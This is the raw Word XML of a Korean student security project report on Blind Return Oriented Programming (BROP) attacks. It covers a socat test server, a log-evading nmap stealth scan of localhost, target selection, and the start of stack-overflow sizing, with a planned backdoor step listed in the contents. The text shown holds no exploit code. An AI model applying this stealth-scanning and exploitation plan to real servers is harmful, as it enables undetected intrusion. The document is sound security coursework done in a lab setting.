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83D01" w14:textId="77777777" w:rsidR="00260F5B" w:rsidRPr="00260F5B" w:rsidRDefault="00260F5B" w:rsidP="00E77BE2">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RCE &amp; POST EXPLOIT</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(in blackbox situation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41491413" w14:textId="77777777" w:rsidR="00260F5B" w:rsidRPr="00260F5B" w:rsidRDefault="00260F5B" w:rsidP="00260F5B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63ECA588" w14:textId="727B63E1" w:rsidR="00260F5B" w:rsidRPr="00E77BE2" w:rsidRDefault="00260F5B" w:rsidP="00E77BE2">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정보보호 프로젝트</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF5A018" w14:textId="700BED15" w:rsidR="00260F5B" w:rsidRPr="00260F5B" w:rsidRDefault="00260F5B" w:rsidP="00260F5B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>배정훈</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF50BCC" w14:textId="76D2865E" w:rsidR="00E77BE2" w:rsidRPr="00E77BE2" w:rsidRDefault="00FA4C7E" w:rsidP="00E77BE2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</w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFB3099" w14:textId="503D1998" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>목차</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037D258D" w14:textId="5D9A3A59" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E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FA4C7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>프로젝트 개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BD5475" w14:textId="52373EAC" w:rsidR="00FA4C7E" w:rsidRP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프로젝트의 전체적인 내용에 대하여 기술</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089292C3" w14:textId="2C6C32D7" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E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FA4C7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>프로젝트 상세 설명</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE71A3A" w14:textId="7544E614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테스트 서버 구축</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B7DF5" w14:textId="7184EFD9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포트 스캐닝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F2533E" w14:textId="1C267388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공격 타겟 정하기 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(except well-known port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2AF12A" w14:textId="4A865140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공격 타겟 분석 및 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7D15B" w14:textId="21D3A54F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공격 후 지속되는 공격(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>backdoor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7989B6" w14:textId="3768C233" w:rsidR="00FA4C7E" w:rsidRP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ROP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 취약한 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 발견하는 툴</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC0B1E" w14:textId="48EEFC1D" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E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FA4C7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일 구성</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134AB95B" w14:textId="32C91EFC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Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E9714B" w14:textId="52059115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Ppt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25091E7D" w14:textId="5A6434AE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Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E6E2AF" w14:textId="0A98663A" w:rsidR="00FA4C7E" w:rsidRP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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D4A29" w14:textId="13966FDA" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E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FA4C7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>유지보수</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4DBB31" w14:textId="108FC911" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E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향후 유지보수에 관한 내용에 대하여 기술</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4765342F" w14:textId="207C0FD2" w:rsidR="00FA4C7E" w:rsidRPr="00FA4C7E" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7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1FB97E9" w14:textId="15FD83C9" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E">
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>프로젝트 개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07631E6F" w14:textId="52779E2A" w:rsidR="00260F5B" w:rsidRPr="00260F5B" w:rsidRDefault="00260F5B" w:rsidP="00FA4C7E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>소스코드 및 바이너리가 주어지지 않은 상태</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">즉 블랙박스 상황에서 프로세스의 상태나 출력 내용으로 공격을 수행하는 기법을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>BROP(Blind Return Oriented Programming)</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>라고 한다</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>. BROP</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격은 위해서는 서비스가 충돌이 발생한 후 서비스의 반응을 보며 이를 이용하여 원격 공격 코드를 구성할 수 있다</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">또한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>BROP</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">공격은 유출된 </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Gadget</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 사용하여 메모리를 덤프 또는 서비스 프로그램의 바이너리를 추출 가능 하다</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>독점 소프트웨어를 공격하는 것 외에도 바이너리가 공개되지 않은 오픈 소스 소프트웨어를 공격하는 데 매우 유용하다</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>우리는 이러한 것들을 이용하여 프로젝트를 구상하였다</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00934B04" w14:textId="75CAAA5C" w:rsidR="00FA4C7E" w:rsidRDefault="00260F5B" w:rsidP="00260F5B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="100" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>프로젝트 진행과정은 테스트 서버 구축</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>포트 스캐닝</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격 타겟정하기</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격 타켓 분석 및 공격</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격 후 지속되는 공격</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>백도어</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>순으로 진행된다</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">첫 번째 테스트 서버 구축은 모의 서버 구축이기 때문에 별도의 서버를 구축하지 않고 간단하게 환경을 구성할수 있는 도구인 </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">socat </w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>도구를 사용하여 외부로부터 지속적으로 입력을 받을 수 있는 환경을 구축하였다</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF67897" w14:textId="77777777" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7E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01B0C6E3" w14:textId="3A4F6A0D" w:rsidR="00260F5B" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E">
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>프로젝트 상세 설명</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A4486C" w14:textId="79B57DDF" w:rsidR="00FA4C7E" w:rsidRPr="00FA4C7E" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E">
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>테스트 서버 구축</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F465DF" w14:textId="42AACBAC" w:rsidR="00D02C90" w:rsidRDefault="00260F5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위</w:t>
      </w:r>
      <w:r w:rsidRPr="00260F5B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794966C3" wp14:editId="295937D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>664591</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:posOffset>109373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4177030" cy="198945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701070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198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</w:rPr>
        <w:t xml:space="preserve"> 코드와 같이 서버를 구상하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D546279" w14:textId="040B2D53" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7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Socat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">명령어는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">apache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">서버 및 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">nginx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등과 달리 명령어 하나만으로 간단하게 영구적으로 서버를 구축할 수 있기 때문에 본 프로젝트에서는 용이한 테스트를 위하여 s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">ocat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>명령어를 채택하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD67429" w14:textId="2D332CC7" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7E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1F4986A4" w14:textId="7EC81BD4" w:rsidR="00FA4C7E" w:rsidRPr="00FA4C7E" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E">
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>포트 스캐닝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3A0E33" w14:textId="22F0DD35" w:rsidR="00260F5B" w:rsidRDefault="00260F5B" w:rsidP="00260F5B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="함초롬바탕" w:hAnsi="함초롬바탕" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버에 로그가 남지 않는 스캔 기법인 스텔스 스캔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="함초롬바탕"/>
        </w:rPr>
        <w:t>(Stealth Scan)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="함초롬바탕" w:hAnsi="함초롬바탕" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 사용하였다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스텔스 스캔 방법을 이용하면 세션을 완전히 성립하지 않고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공격 대상 시스템의 포트 활성화 여부를 알아내기 때문에 공격 대상의 시스템 관리자는 어떤 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="함초롬바탕"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="함초롬바탕" w:hAnsi="함초롬바탕" w:cs="함초롬바탕" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 가진 공격자가 자신의 시스템을 스캔 했는지 확인 할 수 없다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따라서 포트 스캐닝을 스텔스 스캔을 이용한 것이다</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="함초롬바탕"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459282A7" w14:textId="17D9A0BE" w:rsidR="00FA4C7E" w:rsidRDefault="00260F5B" w:rsidP="00260F5B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60F5B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30F2DEBB" wp14:editId="58BFA16A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24660"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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656930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</w:rPr>
        <w:t xml:space="preserve">명령어 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>sudo nmap-sS localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F84ADB" w14:textId="77777777" w:rsidR="00FA4C7E" w:rsidRDefault="00FA4C7E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0D15C956" w14:textId="2F5DD99E" w:rsidR="00260F5B" w:rsidRDefault="00FA4C7E" w:rsidP="00FA4C7E">
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>공격 타겟 정하기(</w:t>
      </w:r>
      <w:r>
        <w:t>except well-known port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3788C4" w14:textId="7CB0BA88" w:rsidR="00260F5B" w:rsidRDefault="00260F5B" w:rsidP="00260F5B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두 번째 과정에서 포트 스캐닝 스텔스 스캔으로 얻은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>well-known port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 제외한 포트 중에서 대화형 프로그램을 채택하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD5311" w14:textId="466259BD" w:rsidR="00260F5B" w:rsidRDefault="00260F5B" w:rsidP="00260F5B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9CCD1F4" wp14:editId="1C622383">
            <wp:extent cx="5731510" cy="18288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8ACA" w14:textId="1405E944" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A" w:rsidP="00260F5B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일반적으로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>brop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 수행 조건은 계속해서 입력을 넣을 수 있는 반영구적으로 실행되는 서버여야 하기 때문에 이와 같은 과정을 진행하였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2A042" w14:textId="485AD38D" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A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5F729E50" w14:textId="0B0B745D" w:rsidR="000A7E3A" w:rsidRDefault="000A7E3A" w:rsidP="000A7E3A">
      <w:pPr>
        <w:pStyle w:val="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>공격 타겟 분석 및 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517BBD25" w14:textId="51C3A78E" w:rsidR="000A7E3A" w:rsidRPr="000A7E3A" w:rsidRDefault="000A7E3A" w:rsidP="000A7E3A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스택 오버플로우 크기 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0B65EF" w14:textId="0420E2FD" w:rsidR="00260F5B" w:rsidRDefault="006B77A1" w:rsidP="00260F5B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가장 첫번째로는 스택 오버플로우 크기를 확인하는 것이다.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오버플로우 크기를 전혀 모르는 상황이기 때문에 코드를 이용하여 알아내도록 </w:t>
